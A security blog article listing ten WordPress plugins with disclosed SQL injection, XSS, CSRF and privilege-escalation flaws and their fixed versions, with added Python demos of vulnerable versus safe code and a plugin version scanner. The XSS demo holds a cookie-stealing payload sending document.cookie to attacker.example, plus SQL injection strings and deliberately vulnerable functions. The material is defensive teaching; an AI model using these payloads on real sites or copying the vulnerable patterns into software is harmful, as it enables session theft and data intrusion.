Stuffablog.com – The Latest News Updates

Technology
    10 of the Most Vulnerable WordPress Plugins

By Itender Rawat. Published July 20, 2022. Updated August 18, 2022.

WordPress plugins add features and design options that would otherwise require custom code, so most site owners rely on them.

For example, form-builder plugins let you create professional-looking forms by drag and drop instead of coding them from scratch.

Plugins let you build a site quickly, even with little or no coding or web design experience.

However, not every plugin is secure. Some contain bugs or security vulnerabilities that criminals can exploit, and because a plugin runs inside WordPress with the same database and file-system access as the core, a flaw in a plugin is a flaw in the whole site.

A site that also lacks front-line defenses, such as a web application firewall or malware scanning, and that runs on an unpatched server is exposed even further.

This article lists plugins with recently disclosed vulnerabilities so that you can recognize them, check which version you run, and update or remove them before criminals exploit the issues.

    What Are Vulnerable WordPress Plugins?

A vulnerability in a WordPress plugin exposes the site to threats such as takeover and unauthorized data manipulation: plugin code is not sandboxed, so whatever the plugin can do, an attacker who exploits it can do too.

Criminals use a vulnerable plugin as an entry point to gain unauthorized access to your site. Once in, they can plant a persistent backdoor, damage or exfiltrate the data, or render the site inoperable.

To prevent or minimize these attacks, update the plugin to its latest version as soon as a fix is released; the fixed versions listed below are the minimum you should run. If no fix is available, or the plugin is no longer maintained, delete it rather than only deactivating it: a deactivated plugin's files stay on the server, and a flaw in a PHP file that can be requested directly remains reachable.

    Vulnerable WordPress Plugins

The following are 10 of the most vulnerable WordPress plugins at the time of writing. Each entry describes the plugin, the class of vulnerability, and the version in which the fix was released. Version numbers are as of the time of writing; check each plugin's changelog for the current release.

    1.  Check & Log Email

This plugin logs every email WordPress sends and lets you view the log, which helps with auditing and debugging email delivery problems.

The vulnerability disclosed in this plugin is SQL injection. SQL injection occurs when user-supplied input is concatenated into a database query instead of being passed as a bound parameter, so an attacker can change the meaning of the query and read, alter, or delete data in the WordPress database without your knowledge.

As of this writing, this vulnerability has been patched. Update the plugin to version 1.0.3 or higher.
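The following Python script, added here as an illustration and not taken from the Check & Log Email plugin or any other code on this page, reproduces the bug class against an in-memory SQLite table. The table name, columns, rows, and injection strings are constructed sample data. The vulnerable function pastes the input into the SQL text, which is the same mistake as building a query by string concatenation instead of `$wpdb->prepare()` in a WordPress plugin; the safe function binds the value as a parameter.

```python
import sqlite3
from typing import Dict, List, Tuple

# Constructed sample rows for a stand-in email log table.
SAMPLE_ROWS = [
    (1, "alice@example.com", "Password reset"),
    (2, "bob@example.com", "Invoice 42"),
    (3, "carol@example.com", "Welcome"),
]

# Constructed injection strings: each turns the WHERE clause into one that is always true.
PAYLOADS = ["x' OR '1'='1", "' OR 1=1 --"]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE email_log (id INTEGER, recipient TEXT, subject TEXT)")
    conn.executemany("INSERT INTO email_log VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_by_recipient_vulnerable(conn: sqlite3.Connection, recipient: str) -> List[Tuple]:
    # The input is pasted into the SQL text, so quotes and keywords in it become
    # part of the query. Same bug as "SELECT ... WHERE x = '" . $_GET['r'] . "'"
    # handed to $wpdb->get_results() in PHP.
    sql = "SELECT id, recipient, subject FROM email_log WHERE recipient = '" + recipient + "'"
    return conn.execute(sql).fetchall()


def find_by_recipient_safe(conn: sqlite3.Connection, recipient: str) -> List[Tuple]:
    # The value is bound to a placeholder and never parsed as SQL; this is what
    # $wpdb->prepare("... WHERE recipient = %s", $recipient) does in WordPress.
    sql = "SELECT id, recipient, subject FROM email_log WHERE recipient = ?"
    return conn.execute(sql, (recipient,)).fetchall()


def demo() -> Dict[str, List[int]]:
    """Row counts returned for each payload by the vulnerable and the safe query,
    plus the count for a legitimate lookup, so the difference is visible."""
    conn = make_db()
    return {
        "vulnerable": [len(find_by_recipient_vulnerable(conn, p)) for p in PAYLOADS],
        "safe": [len(find_by_recipient_safe(conn, p)) for p in PAYLOADS],
        "legitimate": [len(find_by_recipient_safe(conn, "bob@example.com"))],
    }


if __name__ == "__main__":
    print(demo())
```

For both payloads the vulnerable query hands back every row in the table, while the parameterized query returns nothing because no recipient literally equals the payload string. The same comparison applies to the Permalink Manager Lite and uListing entries later in this list, which fall into the same bug class.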

    2.  WooCommerce Product Table Lite

WooCommerce Product Table Lite displays WooCommerce products in interactive table layouts. It suits businesses that sell from an inventory, such as spare-parts shops, restaurants, and online electronics stores.

This is the lite version; the pro version adds compatibility with more third-party plugins, a larger pool of table elements, and further shortcode attributes for refining product queries.

The vulnerability found in this plugin is reflected cross-site scripting (XSS). XSS is an injection attack in which a malicious script ends up in a page served by an otherwise harmless WordPress site. In the reflected variant, the script arrives in a crafted link or form submission and is echoed back in the response without being escaped.

When a victim opens that link, the script runs in their browser under the site's origin, so the browser treats it exactly like the site's own code.

A successful XSS attack lets the script read the page, send requests with the victim's session, and read any cookies not flagged HttpOnly. If the victim is a logged-in administrator, the attacker can use that session to create users or install plugins.

This flaw has been fixed. Users running version 2.4.0 or higher are protected from this particular issue, though not, of course, from XSS bugs in other plugins.
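An added Python example, not the plugins' own code, showing why the fix for reflected and stored XSS alike is escaping at output time, and why the escaping must match the context the value lands in. The payloads and the render functions are constructed for illustration; the WordPress equivalents named in the comments are `esc_html()`, `esc_attr()` and `esc_url()`. The same example covers the stored XSS entries later in this list (WP Table Builder, Countdown and CountUp, Ninja Forms, Visual Form Builder, Wappointment, YITH Maintenance Mode), since stored and reflected XSS differ only in where the payload comes from, not in how output must be escaped.

```python
import html
from urllib.parse import urlparse

# Constructed payloads of the kind a reflected or stored XSS would carry.
TEXT_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'
URL_PAYLOAD = "javascript:alert(document.domain)"


def render_results_vulnerable(term: str) -> str:
    # Raw interpolation: the browser parses the payload as markup.
    return f"<p>Results for: <b>{term}</b></p>"


def render_results_safe(term: str) -> str:
    # Text context: escape &, <, >, " and '. WordPress: esc_html().
    return f"<p>Results for: <b>{html.escape(term, quote=True)}</b></p>"


def render_input_vulnerable(value: str) -> str:
    # Attribute context: a stray quote closes the attribute and adds an event handler.
    return f'<input type="text" name="q" value="{value}">'


def render_input_safe(value: str) -> str:
    # quote=True is what makes html.escape safe inside a quoted attribute. WordPress: esc_attr().
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def safe_href(url: str) -> str:
    # URL context: escaping does nothing against javascript: URLs, so restrict the
    # scheme before escaping, as WordPress's esc_url() does.
    if urlparse(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def is_exploitable(markup: str) -> bool:
    """Crude check used by the demo: a live script tag or event handler survived into the output."""
    lowered = markup.lower()
    return "<script" in lowered or 'onfocus="' in lowered


def demo() -> dict:
    return {
        "text_vulnerable": is_exploitable(render_results_vulnerable(TEXT_PAYLOAD)),
        "text_safe": is_exploitable(render_results_safe(TEXT_PAYLOAD)),
        "attr_vulnerable": is_exploitable(render_input_vulnerable(ATTR_PAYLOAD)),
        "attr_safe": is_exploitable(render_input_safe(ATTR_PAYLOAD)),
        "href_blocked": safe_href(URL_PAYLOAD),
        "href_allowed": safe_href("https://example.com/?a=1&b=2"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the three contexts is that one escaping function is not enough: entity-encoding stops the text and attribute payloads, but a `javascript:` URL contains nothing to encode and has to be rejected by scheme.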

    3.  WP Table Builder

    This plugin helps users design WordPress tables easily by using drag and drop to build tables. The WP Table Builder is recommended for creating easy-to-read tables like comparison tables, lists, and pricing tables.

WP Table Builder had an XSS vulnerability of the same kind as WooCommerce Product Table Lite.

Attackers exploit XSS to run code in a user's browser in the context of the site, hijacking the user's WordPress session to steal sensitive information or change data without the user's knowledge.

This vulnerability was resolved in version 1.3.10.

    4.  Permalink Manager Lite

This plugin is an advanced WordPress permalink editor that lets you manage the URL addresses of all pages and posts. Permalinks are the permanent URLs of your content, meant to remain unchanged for years.

    One helpful feature of this plugin is that it allows you to redirect old permalink addresses to new custom permalinks without getting a 404 error (page not found).

    Some of this plugin’s features include:

    • Complete permalink editing – You can set custom permalinks for every post or page.
    • Auto-redirect – Old permalinks automatically redirect to new custom permalinks, preventing you from encountering 404 errors.
    • Translate permalinks – Permalink Manager allows you to define different permalink formats per language, mainly when using other multilanguage plugins like WPML or Polylang.

The most recent major vulnerability of this plugin is SQL injection, which lets an attacker query the WordPress database without the owner's knowledge.

They can also perform unauthorized data manipulation, causing incorrect or missing entries.

The developers released a fix in September 2021. Update to version 2.2.13.1 or higher.

    5.  Countdown and CountUp, WooCommerce Sales Timer

    This plugin allows you to create timers, especially for sales and marketing purposes, such as a countdown timer for a product launch.


The timer lets you pick dates from a calendar, set hours, minutes, and a time zone, and customize the labels of the day, hour, minute, and second fields.

    Another feature of this plugin is that it lets you set an action when the timer expires, such as showing messages or images after the countdown.

Two vulnerabilities were disclosed: cross-site request forgery (CSRF) and stored cross-site scripting (stored XSS).

CSRF tricks a logged-in user's browser into sending a request the user never intended, for example by embedding a hidden form on an attacker's page. The application accepts the request because the browser attaches the user's session cookie. WordPress defends against this with nonces, tokens that a plugin must generate for its forms and verify on every state-changing action; a handler that skips the check is vulnerable.

Stored XSS occurs when attacker-supplied data is saved by the application, for instance in a timer's text fields, and later included unescaped in pages shown to other users, including administrators.

Version 1.5.8 fixed both issues. If you use this plugin, update to the latest version, which was 1.6.7 at the time of writing.

    6.  Ninja Forms Contact Form

Ninja Forms is a drag-and-drop form builder that lets WordPress users with little or no coding skill build professional-looking forms for their websites.

    The plugin developers have a support team that can assist you with any issues. The plugin is also user-friendly, so building forms does not require you to have technical skills.

Ninja Forms also lets you add file-upload fields to a form and export submissions to documents such as PDF or Excel files, or to Google Sheets.

    The plugin is also helpful when you create forms that accept payment and donations or forms that provide signups and lead generation.

According to its changelog, the plugin has received many bug fixes since its release. One of its most recent vulnerabilities was stored XSS.

Version 3.5.8.2 fixed that stored XSS. As of November 2021, the current version was 3.6.6.

    7.  Visual Form Builder

    Visual Form Builder is another plugin for creating and managing forms in WordPress.

This plugin allows you to build functional forms in minutes without writing any HTML, PHP, or CSS code.

    This plugin’s features include drag and drop reordering, one-click addition of form fields, a logic-based anti-spam system, and automatic storage of entries into the WordPress database.

    One of the security vulnerabilities of this plugin is stored XSS. The plugin developers resolved this issue in September 2021. If you are using this plugin, be sure to update to version 3.0.4 or higher for protection from the stored XSS vulnerability.

    8.  Wappointment

    The Wappointment plugin allows you to quickly set appointments, such as scheduled office meetings, phone calls, or Zoom and Google Meet sessions.

    The plugin provides a calendar for booking appointments and is used by teachers, therapists, personal trainers, and other service professionals.

    Wappointment also lets you synchronize bookings to your Google Calendar. The plugin prevents double bookings and refreshes your availability whenever there are changes to your schedule.

    The booking form is user-friendly, and it shows clients your availability, making setting appointments easy.

    In addition, the plugin can send confirmations and reminders to your clients. You can set when those confirmations are sent, like one day or one hour before the appointment.

The vulnerability disclosed in this plugin was an unauthenticated stored XSS: the attacker needs no account to plant the script, and it later runs in the browser of whoever views the stored data, typically the site owner in the admin dashboard. The severity is rated high because the plugin stores sensitive client information and the script executes with the administrator's session.

This issue was fixed in August 2021 in version 2.2.5.

    9.  uListing

    This plugin is helpful and convenient for websites specializing in classified ads and other listings.

    Before this plugin was created, setting up websites with these kinds of listings was a complicated matter. Website owners usually had to invest in multiple plugins to create listings or directories.

    uListing uses a drag and drop builder and customizable field forms to help create informative websites for various listing purposes, such as job postings, inventories, property sales, rentals, and real estate listings.

uListing had several vulnerabilities before version 2.0.6, including CSRF, SQL injection, and unauthenticated privilege escalation.

Privilege escalation means a user gains access to resources or functions beyond what their role allows. Granting extra privileges is normal when an administrator does it deliberately, for example when a contributor is promoted to editor.

The vulnerability is when the application lets anyone, including an unauthenticated visitor, trigger such a change. The usual cause is a request handler that modifies roles, settings, or data without checking who is calling it: in WordPress terms, it neither verifies the request nonce nor checks the caller's capability with current_user_can().
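An added Python model of the missing checks behind the CSRF and unauthenticated privilege escalation entries in this list (items 5 and 9). It is not code from uListing or any other plugin named here; the accounts, capabilities, sessions and nonce scheme are constructed. The vulnerable handler changes a user's role based solely on request parameters. The hardened one performs the three checks a WordPress AJAX or REST handler should make: the caller is logged in, the request carries a nonce bound to that caller's session and to this action (WordPress: `wp_verify_nonce()` or `check_ajax_referer()`), and the caller holds the required capability (`current_user_can('promote_users')`).

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Per-site secret; WordPress derives its nonces from the salts in wp-config.php.
SECRET = secrets.token_bytes(32)

# Capabilities per role, reduced to the one this example needs.
ROLE_CAPS = {"administrator": {"promote_users"}, "editor": set(), "subscriber": set()}

Users = Dict[str, Dict[str, str]]


def fresh_users() -> Users:
    """Constructed sample accounts."""
    return {"alice": {"role": "administrator"}, "mallory": {"role": "subscriber"}}


def make_nonce(session_id: str, action: str) -> str:
    """Token bound to one session and one action, in the spirit of wp_create_nonce()."""
    message = f"{session_id}|{action}".encode()
    return hmac.new(SECRET, message, hashlib.sha256).hexdigest()[:20]


def verify_nonce(nonce: str, session_id: str, action: str) -> bool:
    # Constant-time compare on bytes so attacker-controlled input cannot trip TypeError.
    expected = make_nonce(session_id, action).encode()
    return hmac.compare_digest(nonce.encode("utf-8", "replace"), expected)


def set_role_vulnerable(users: Users, request: Dict[str, str]) -> bool:
    """The bug class: trusts request parameters and checks nothing about the caller."""
    users[request["target"]]["role"] = request["role"]
    return True


def set_role_safe(users: Users, request: Dict[str, str],
                  session: Optional[Dict[str, str]]) -> Tuple[bool, str]:
    """Hardened handler: login, nonce (CSRF) and capability (authorization) checks."""
    if session is None:
        return False, "not logged in"
    # Nonce tied to this session and action: a forged cross-site request carries the
    # victim's cookie but cannot know the victim's nonce.
    if not verify_nonce(request.get("nonce", ""), session["id"], "set_role"):
        return False, "bad nonce"
    # Authorization: being logged in is not enough (WordPress: current_user_can()).
    caller_role = users[session["user"]]["role"]
    if "promote_users" not in ROLE_CAPS[caller_role]:
        return False, "missing capability"
    if request["role"] not in ROLE_CAPS or request["target"] not in users:
        return False, "invalid target or role"
    users[request["target"]]["role"] = request["role"]
    return True, "ok"


if __name__ == "__main__":
    users = fresh_users()
    set_role_vulnerable(users, {"target": "mallory", "role": "administrator"})
    print("vulnerable handler, anonymous request:", users["mallory"]["role"])
    users = fresh_users()
    admin = {"user": "alice", "id": "s-alice"}
    req = {"target": "mallory", "role": "editor", "nonce": make_nonce(admin["id"], "set_role")}
    print("safe handler, admin with nonce:", set_role_safe(users, req, admin), users["mallory"]["role"])
```

The two checks are not interchangeable: the nonce stops an attacker's page from riding on an administrator's cookie, and the capability check stops a logged-in subscriber who can obtain a perfectly valid nonce for their own session. A handler that has only one of them is still exploitable.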

Version 2.0.6 addressed these vulnerabilities. As of this writing, the latest version is 2.1.0.

    10. YITH Maintenance Mode

    Some websites may be undergoing changes or maintenance. Website owners need a temporary page to inform visitors that the website is unavailable. This situation is where the YITH Maintenance Mode plugin comes in.

Once you have installed the plugin on your WordPress site, you only need to enable it to deploy the “maintenance mode” page.

The significant vulnerability of this plugin is stored XSS. Its severity was rated low because of the plugin's limited scope, which is only to show a maintenance page.

This issue was resolved in September 2021, in version 1.4.0.
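To turn the list above into something you can check against a site, here is an added Python script (not part of the article or of any plugin) that reads the `Plugin Name:` and `Version:` headers from each plugin's main PHP file, the same headers WordPress itself reads from the first 8 KB of the file, and flags any plugin from this list that is below the fixed version stated here. The minimum versions are the ones quoted in this article; the plugin names are matched on the header text as written above after normalization, which is an assumption, since a plugin's actual header may use a slightly different name. `demo()` builds a constructed two-plugin tree in a temporary directory so the script runs offline; point `scan_plugins()` at a real `wp-content/plugins` directory to use it.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Minimum fixed versions as stated in this article, keyed by plugin name as written above.
MIN_FIXED = {
    "Check & Log Email": "1.0.3",
    "WooCommerce Product Table Lite": "2.4.0",
    "WP Table Builder": "1.3.10",
    "Permalink Manager Lite": "2.2.13.1",
    "Countdown and CountUp, WooCommerce Sales Timer": "1.5.8",
    "Ninja Forms": "3.5.8.2",
    "Visual Form Builder": "3.0.4",
    "Wappointment": "2.2.5",
    "uListing": "2.0.6",
    "YITH Maintenance Mode": "1.4.0",
}

# Matches "Plugin Name: X" / "Version: X" inside the header comment, tolerating the
# leading " * " or "//" decoration WordPress also tolerates.
HEADER_RE = re.compile(r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t]*$", re.M)


def normalize(name: str) -> str:
    """Case- and punctuation-insensitive key (assumption: good enough to match headers)."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.2.13.1' -> (2, 2, 13, 1); non-numeric parts are ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def version_lt(installed: str, minimum: str) -> bool:
    """True when installed < minimum, treating missing trailing parts as zero."""
    a, b = parse_version(installed), parse_version(minimum)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def read_plugin_header(php_file: Path) -> Optional[Dict[str, str]]:
    """Return the header fields if this file carries a plugin header, else None."""
    head = php_file.read_bytes()[:8192].decode("utf-8", "replace")
    fields = dict(HEADER_RE.findall(head))
    if "Plugin Name" in fields and "Version" in fields:
        return fields
    return None


def scan_plugins(plugins_dir: Path) -> List[Tuple[str, str, str]]:
    """(name, installed, minimum) for every listed plugin installed below its fixed version."""
    wanted = {normalize(name): (name, minimum) for name, minimum in MIN_FIXED.items()}
    findings = []
    for php in sorted(plugins_dir.glob("*/*.php")):
        header = read_plugin_header(php)
        if header is None:
            continue
        key = normalize(header["Plugin Name"])
        if key in wanted and version_lt(header["Version"], wanted[key][1]):
            findings.append((wanted[key][0], header["Version"], wanted[key][1]))
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed fixture: one outdated plugin and one that is already past its fix."""
    (root / "check-email").mkdir()
    (root / "check-email" / "check-email.php").write_text(
        "<?php\n/**\n * Plugin Name: Check & Log Email\n * Version: 1.0.2\n */\n"
    )
    (root / "ninja-forms").mkdir()
    (root / "ninja-forms" / "ninja-forms.php").write_text(
        "<?php\n/*\nPlugin Name: Ninja Forms\nVersion: 3.6.6\n*/\n"
    )


def demo() -> List[Tuple[str, str, str]]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_plugins(root)


if __name__ == "__main__":
    for name, installed, minimum in demo():
        print(f"UPDATE {name}: installed {installed} < fixed {minimum}")
```

A plugin that is absent from the scan output is not necessarily safe: the script only knows about the ten fixes quoted here, and a plugin whose directory holds no header file (or whose header is written differently) is silently skipped, so treat its output as a starting point, not a clean bill of health.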

    Conclusion

    WordPress plugins provide a lot of functionality and benefits for website owners and content creators.

However, you should review a plugin's changelog and security advisories before installing it, keep it updated, and remove plugins that are unmaintained, so that they do not expose your data to criminals.

    Consult an IT professional or WordPress developer for more information on WordPress plugins and what plugins may be safe or unsafe for you to use.
